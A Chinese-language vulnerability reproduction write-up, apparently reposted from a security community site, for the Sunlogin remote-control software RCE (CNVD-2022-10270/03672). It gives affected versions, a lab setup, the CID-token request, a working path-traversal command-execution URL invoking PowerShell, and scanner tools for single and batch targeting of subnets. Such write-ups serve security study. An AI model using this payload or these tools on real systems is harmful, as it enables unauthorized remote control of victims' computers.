向日葵RCE复现 | CNVD-2022-10270 CNVD-2022-03672

简介: 向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

本文转载自助安社区(https://secself.com/),海量入门学习资料。

date: 2023-03-25 15:24:00
tags:

  • 渗透测试
  • 漏洞复现

categories:

  • CNVD-2022-03672
  • CNVD-2022-10270
  • 向日葵RCE

keywords: 渗透测试,漏洞复现,CNVD-2022-03672,CNVD-2022-10270

前言

向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

影响版本

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版   <= V1.0.1.43315(2021.12)

漏洞级别

高危

环境搭建

在虚拟机里安装11.0.0.33的低版本向日葵

image-20230219135253229

漏洞复现

使用nmap或其他工具探测目标端口

image-20230219135507131

在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID)

image-20230219150724105

Cookies添加拿到的CID后加上payload请求

http://192.168.52.133:49437/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami

image-20230219151000880

image-20230219151134780

手动复现完成

工具使用

使用工具自带的扫描

xrkRce.exe -h ip -t scan

image-20230219152233952

测试命令执行

image-20230219153035239

批量检测

python3 sunlogin-fuzz.py -t 192.168.52.128/25

image-20230219162629384

相关工具文件,安装包私信公众号向日葵获取

相关文章
|
7月前
|
SQL 云安全 安全
常见的web漏洞,网站漏洞该怎么办
随着互联网的发展,网站安全成为企业和个人关注焦点,尤其网站漏洞可能导致数据泄露、系统崩溃等严重后果。本文介绍了四种常见网站漏洞:XSS、SQL注入、文件包含和CSRF,以及它们的危害。为解决这些问题,建议加强代码审查、输入验证、使用安全API和库、访问控制等措施。此外,德迅云安全的漏洞扫描VSS服务可在Web漏洞扫描、弱密码扫描和中间件扫描等场景中发挥作用,帮助企业及时发现并处理安全问题,保障网站安全。
|
3月前
|
安全 网络安全 数据安全/隐私保护
渗透测试-Openssl心脏出血漏洞复现
渗透测试-Openssl心脏出血漏洞复现
157 7
|
开发框架 安全 前端开发
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
400 0
|
SQL 安全 网络安全
我是如何拿下CNVD漏洞证书的
我是如何拿下CNVD漏洞证书的
|
安全 网络安全 Windows
向日葵RCE(CNVD-2022-10270)
向日葵RCE(CNVD-2022-10270)
221 0
|
安全 Windows
14 向日葵远程RCE漏洞
向日葵是一款远控软件
14 向日葵远程RCE漏洞
|
安全 Shell PHP
RCE漏洞挖掘经验分享(一)
RCE漏洞挖掘经验分享(一)
786 0
|
云安全 安全 jenkins
威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板”
简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件。除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患。 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误认为是漏洞发现者在进行测试,因此我们将木马命名为ImposterMiner(冒充者)。
9271 0